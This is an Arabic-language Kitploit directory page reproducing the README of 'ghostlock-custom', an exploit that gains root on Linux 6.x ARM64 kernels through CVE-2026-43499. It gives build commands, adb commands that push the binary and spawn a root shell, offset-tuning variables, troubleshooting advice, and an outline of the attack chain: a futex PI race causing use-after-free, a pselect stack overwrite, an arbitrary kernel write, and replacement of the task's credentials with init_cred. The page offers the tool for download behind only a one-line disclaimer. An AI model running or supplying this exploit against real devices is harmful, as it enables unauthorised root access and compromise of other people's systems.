Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ghostlock-custom — تكييف GhostLock (CVE-2026-43499) لبيئة Linux 6.x ARM64 غير المخصصة لنظام Android | Kitploit
أدوات/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

تكييف GhostLock (CVE-2026-43499) لبيئة Linux 6.x ARM64 غير المخصصة لنظام Android

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
7منذ شهر واحدلم تتم المراجعة بعد

GhostLock Custom — نسخة مُكيَّفة من CVE-2026-43499

استغلال لرفع الصلاحيات عبر GhostLock (CVE-2026-43499) يستهدف أنوية Linux 6.x ARM64 غير التابعة لنظام Android.

خصائص النواة

البندالقيمة
البنيةARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
إصدار النواة6.x
SELinuxلا يوجد
ashmemلا يوجد
configfsلا يوجد

البناء

البناء محليًا (يتطلب مترجمًا تقاطعيًا)

make

البناء عبر Android NDK

make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (بناء سحابي)

يتم تشغيل البناء تلقائيًا بعد الدفع (push)؛ ما عليك سوى تنزيل الـ artifact.

الاستخدام

# 推送到目标设备
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# 获取 root shell
adb shell /data/local/tmp/e --shell

# 调整 pselect 偏移 (如果默认值不工作)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# 指定物理加载地址
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

متغيرات البيئة

المتغيرالقيمة الافتراضيةالوصف
PSELECT_SHIFT-2ضبط إزاحة waiter الخاص بـ pselect على المكدس
KPHYS0x80000000عنوان التحميل الفيزيائي للنواة
KIMAGE_TEXT_BASE0xffffffc008000000العنوان الافتراضي الأساسي للنواة

مبدأ رفع الصلاحيات

  1. سباق futex PI: FUTEX_CMP_REQUEUE_PI يُطلق استغلال استخدام بعد التحرير (UAF) في remove_waiter()
  2. الكتابة فوق مكدس pselect: يستقر rt_mutex_waiter المحرَّر في المخزن stack_fds المؤقت
  3. الكتابة في شجرة PI: إجراء الكتابة إلى أي عنوان في النواة عبر waiter مزيف مُنشأ
  4. الكتابة فوق cred: استبدال task_struct->cred بـ init_cred

ملاحظات التكييف

هذا الإصدار نسخة مبسّطة من ghostlock-oneplus:

  • إزالة كود تعطيل SELinux (هذه النواة لا تحتوي على SELinux)
  • إزالة الكود المتعلق بـ ashmem/configfs (هذه النواة لا تحتوي على هذه المكونات)
  • إزالة كود تثبيت KernelSU
  • إزالة تسريب SLIDE KASLR (لا توجد loggers/nfulnl_logger)
  • إزالة الكود الخاص بنظام Android (miniADB وغيرها)

استكشاف الأخطاء وإصلاحها

العَرَضالسبب المحتملالحل
إعادة تشغيل الجهازقيمة PSELECT_SHIFT غير صحيحةجرّب كل قيمة من -4 إلى +4 بالتتابع
لا تأثيرقيمة KPHYS غير صحيحةتحقق من القيمة الصحيحة في /proc/iomem
perf_event_open failedقيود seccompجرّب التشغيل عبر ADB shell
لا يوجد rootعدم تطابق الإزاحاتتحقق من إصدار النواة وافحص TASK_CRED_OFF

إخلاء المسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني فقط. يتحمل المستخدم المسؤولية الكاملة عن استخدامها.

تنزيل الأداة